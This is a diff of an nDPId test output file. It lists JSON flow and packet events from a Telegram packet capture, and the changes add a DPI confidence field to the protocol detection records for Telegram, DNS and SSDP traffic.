-00606{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":737,"source":"telegram.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.1","src_port":28150,"dst_port":533,"l4_proto":"udp","ndpi": {"proto":"Telegram","breed":"Acceptable","category":"Chat"}}
+00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":737,"source":"telegram.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.1","src_port":28150,"dst_port":533,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":738,"source":"telegram.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.5","src_port":28150,"dst_port":537,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":738,"source":"telegram.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1588779637543,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1588779637543,"pkt":"EBMx8Tl2KDc3AG3ICABFAABEayUAAEAR5h3AqAFNW2wMBW32AhkAMN01L+Sfp2xOtDPLzYKhu+piHv\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/+U8S0SsiW5Mg=="}
-00607{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":738,"source":"telegram.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.5","src_port":28150,"dst_port":537,"l4_proto":"udp","ndpi": {"proto":"Telegram","breed":"Acceptable","category":"Chat"}}
+00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":738,"source":"telegram.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.5","src_port":28150,"dst_port":537,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":739,"source":"telegram.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.3","src_port":28150,"dst_port":537,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":739,"source":"telegram.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1588779637543,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1588779637543,"pkt":"EBMx8Tl2KDc3AG3ICABFAABEEQsAAEARPDrAqAFNW2wQA232AhkAMF6eL+Sfp2xOtDPLzYKhu+piHv\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/Ppp3gSInx5A=="}
-00607{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":739,"source":"telegram.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.3","src_port":28150,"dst_port":537,"l4_proto":"udp","ndpi": {"proto":"Telegram","breed":"Acceptable","category":"Chat"}}
+00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":739,"source":"telegram.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.3","src_port":28150,"dst_port":537,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":740,"source":"telegram.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1588779637560,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"ts_msec":1588779637560,"pkt":"EBMx8Tl2KDc3AG3ICABFAABF+GQAAP8RP6TAqAFNwKgBAdVDADUAMZzqakQBAAABAAAAAAAAAWIHX2Rucy1zZARfdWRwBG50b3ADb3JnAAAMAAE="}
 00561{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":741,"source":"telegram.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1588779637572,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":136,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":136,"pkt_l4_len":102,"ts_msec":1588779637572,"pkt":"KDc3AG3IEBMx8Tl2CABFAAB67hUAAEARCL\/AqAEBwKgBTQA11UMAZgAAakSBgwABAAAAAQAAAWIHX2Rucy1zZARfdWRwBG50b3ADb3JnAAAMAAHAGwAGAAEAAAA0ACkFZG5zZG\/AGwpwb3N0bWFzdGVywBt4ZvNkAACowAAAHCAAJOoAAAACWA=="}
-00752{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":741,"source":"telegram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1588779629079,"flow_last_seen":1588779637572,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1588779637572,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":54595,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.ntop","breed":"Safe","category":"Network"},"dns": {"query":"b._dns-sd._udp.ntop.org","num_queries":1,"num_answers":1,"reply_code":3,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00778{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":741,"source":"telegram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1588779629079,"flow_last_seen":1588779637572,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1588779637572,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":54595,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ntop","breed":"Safe","category":"Network"},"dns": {"query":"b._dns-sd._udp.ntop.org","num_queries":1,"num_answers":1,"reply_code":3,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":742,"source":"telegram.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1588779637577,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"ts_msec":1588779637577,"pkt":"KDc3AG3IEBMx8Tl2CABFAABcg6JAADMRnoxbbAgBwKgBTQIVbfYASNOVL+Sfp2xOtDPLzYKhu+piHv\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8dyFcB12rJei6011ugWGAoAAAAAAAAAAAAA\/\/9XC83DTfQAAA=="}
 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":743,"source":"telegram.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1588779637582,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"ts_msec":1588779637582,"pkt":"KDc3AG3IEBMx8Tl2CABFAABc3cdAADMRRGBbbAgIwKgBTQIRbfYASNNBL+Sfp2xOtDPLzYKhu+piHv\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8dyFcB12rJeEn+yq6ttUV0AAAAAAAAAAAAA\/\/9XC83DTfQAAA=="}
 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":744,"source":"telegram.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1588779637681,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"ts_msec":1588779637681,"pkt":"KDc3AG3IEBMx8Tl2CABFAABcuRdAADQRZBVbbAwDwKgBTQISbfYASKh2L+Sfp2xOtDPLzYKhu+piHv\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8dyFcB12rJetvsboDHt5DsAAAAAAAAAAAAA\/\/9XC83DTfQAAA=="}
@@ -192,7 +192,7 @@
 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"telegram.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1588779637715,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"ts_msec":1588779637715,"pkt":"KDc3AG3IEBMx8Tl2CABFAABcdalAADYRoYVbbBABwKgBTQIRbfYASCaUL+Sfp2xOtDPLzYKhu+piHv\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8dyFcB12rJeYA3ERBA7Mh0AAAAAAAAAAAAA\/\/9XC83DTfQAAA=="}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":748,"source":"telegram.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637830,"flow_last_seen":1588779637830,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"ts_msec":1588779637830,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"239.255.255.250","src_port":52127,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":748,"source":"telegram.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1588779637830,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"ts_msec":1588779637830,"pkt":"AQBef\/\/6KDc3AG3ICABFAADKg14AAAERg9XAqAFN7\/\/\/+sufB2wAtsJkTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogR29vZ2xlIENocm9tZS84My4wLjQxMDMuMzQgTWFjIE9TIFgNCg0K"}
-00614{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":748,"source":"telegram.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637830,"flow_last_seen":1588779637830,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"ts_msec":1588779637830,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"239.255.255.250","src_port":52127,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":748,"source":"telegram.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637830,"flow_last_seen":1588779637830,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"ts_msec":1588779637830,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"239.255.255.250","src_port":52127,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":749,"source":"telegram.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1588779638048,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1588779638048,"pkt":"EBMx8Tl2KDc3AG3ICABFAABEsZEAAEARo67AqAFNW2wICG32AhEAMJEzL+Sfp2xOtDPLzYKhu+piHv\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/9ywagRVgIMjg=="}
 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":750,"source":"telegram.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1588779638048,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1588779638048,"pkt":"EBMx8Tl2KDc3AG3ICABFAABEUI8AAEAR\/LfAqAFNW2wQAW32AhEAMO1PL+Sfp2xOtDPLzYKhu+piHv\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/cV+9m8\/VZmQ=="}
 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":751,"source":"telegram.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1588779638048,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1588779638048,"pkt":"EBMx8Tl2KDc3AG3ICABFAABEfdIAAEAR03LAqAFNW2wMA232AhIAMLZjL+Sfp2xOtDPLzYKhu+piHv\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/DysMOlAk5VA=="}
@@ -207,74 +207,74 @@
 00847{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1129,"source":"telegram.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1588779645375,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":353,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":353,"pkt_l4_len":319,"ts_msec":1588779645375,"pkt":"AQBeAAD7eCjKBfrMCABFAAFTiPpAAAERTLfAqAFF4AAA+xTpFOkBP9DmAACEAAAAAAEAAAADEF9zcG90aWZ5LWNvbm5lY3QEX3RjcAVsb2NhbAAADAABAAAAeAAvEXNvbm9zNzgyOENBMDVGQUNDEF9zcG90aWZ5LWNvbm5lY3QEX3RjcAVsb2NhbAARc29ub3M3ODI4Q0EwNUZBQ0MQX3Nwb3RpZnktY29ubmVjdARfdGNwBWxvY2FsAAAQgAEAABGUAB0LVkVSU0lPTj0xLjAQQ1BhdGg9L3Nwb3RpZnl6YxFzb25vczc4MjhDQTA1RkFDQxBfc3BvdGlmeS1jb25uZWN0BF90Y3AFbG9jYWwAACGAAQAAAHgAHwAAAAAFeBFzb25vczc4MjhDQTA1RkFDQwVsb2NhbAARc29ub3M3ODI4Q0EwNUZBQ0MFbG9jYWwAAAGAAQAAAHgABMCoAUU="}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1131,"source":"telegram.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779645381,"flow_last_seen":1588779645381,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1588779645381,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"239.255.255.250","src_port":50698,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00605{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1131,"source":"telegram.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1588779645381,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1588779645381,"pkt":"AQBef\/\/6wJrQLWJ0CABFAACa3qgAAAERKNPAqAE17\/\/\/+sYKB2wAhlIKTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQoA"}
-00615{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1131,"source":"telegram.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779645381,"flow_last_seen":1588779645381,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1588779645381,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"239.255.255.250","src_port":50698,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1131,"source":"telegram.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779645381,"flow_last_seen":1588779645381,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1588779645381,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"239.255.255.250","src_port":50698,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00605{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1218,"source":"telegram.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1588779647380,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1588779647380,"pkt":"AQBef\/\/6wJrQLWJ0CABFAACaUgcAAAERtXTAqAE17\/\/\/+sYKB2wAhlIKTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQoA"}
 00847{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1220,"source":"telegram.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1588779647380,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":353,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":353,"pkt_l4_len":319,"ts_msec":1588779647380,"pkt":"AQBeAAD7eCjKBfrMCABFAAFTigFAAAERS7DAqAFF4AAA+xTpFOkBP9DmAACEAAAAAAEAAAADEF9zcG90aWZ5LWNvbm5lY3QEX3RjcAVsb2NhbAAADAABAAAAeAAvEXNvbm9zNzgyOENBMDVGQUNDEF9zcG90aWZ5LWNvbm5lY3QEX3RjcAVsb2NhbAARc29ub3M3ODI4Q0EwNUZBQ0MQX3Nwb3RpZnktY29ubmVjdARfdGNwBWxvY2FsAAAQgAEAABGUAB0LVkVSU0lPTj0xLjAQQ1BhdGg9L3Nwb3RpZnl6YxFzb25vczc4MjhDQTA1RkFDQxBfc3BvdGlmeS1jb25uZWN0BF90Y3AFbG9jYWwAACGAAQAAAHgAHwAAAAAFeBFzb25vczc4MjhDQTA1RkFDQwVsb2NhbAARc29ub3M3ODI4Q0EwNUZBQ0MFbG9jYWwAAAGAAQAAAHgABMCoAUU="}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1281,"source":"telegram.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779648840,"flow_last_seen":1588779648840,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1588779648840,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"239.255.255.250","src_port":56384,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00606{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1281,"source":"telegram.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1588779648840,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1588779648840,"pkt":"AQBef\/\/6wJrQLWJ0CABFAACaCVUAAAER\/ibAqAE17\/\/\/+txAB2wAhjvUTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQoA"}
-00615{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1281,"source":"telegram.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779648840,"flow_last_seen":1588779648840,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1588779648840,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"239.255.255.250","src_port":56384,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1281,"source":"telegram.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779648840,"flow_last_seen":1588779648840,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1588779648840,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"239.255.255.250","src_port":56384,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1341,"source":"telegram.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1588779650102,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"ts_msec":1588779650102,"pkt":"EBMx8Tl2KDc3AG3ICABFAABM8zMAAEARoKnAqAFNVwvNw2326XwAOBQNt7NLZEiPyb9nJ25aFShQjjbK9tSAqF2RZJuCl4MIgiF4TeaDrkRovC99CpyADzRp"}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1373,"source":"telegram.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779650651,"flow_last_seen":1588779650651,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1588779650651,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":58615,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1373,"source":"telegram.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1588779650651,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1588779650651,"pkt":"EBMx8Tl2KDc3AG3ICABFAABD6GYAAP8RT6TAqAFNwKgBAeT3ADUAL99XO7EBAAABAAAAAAAACXRlbGVtZXRyeQdkcm9wYm94A2NvbQAAAQAB"}
-00748{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1373,"source":"telegram.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779650651,"flow_last_seen":1588779650651,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1588779650651,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":58615,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"telemetry.dropbox.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
